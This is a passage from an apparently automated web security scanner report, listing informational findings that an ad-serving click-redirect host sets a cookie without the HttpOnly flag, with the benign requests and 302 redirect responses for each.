Date: Tue, 25 Jan 2011 14:37:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.416. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.417. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.418. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.419. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.420. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

14.421. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:54:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.422. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.423. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.424. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:56:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.425. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:07:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.426. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.427. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.428. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.429. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:44:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.430. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
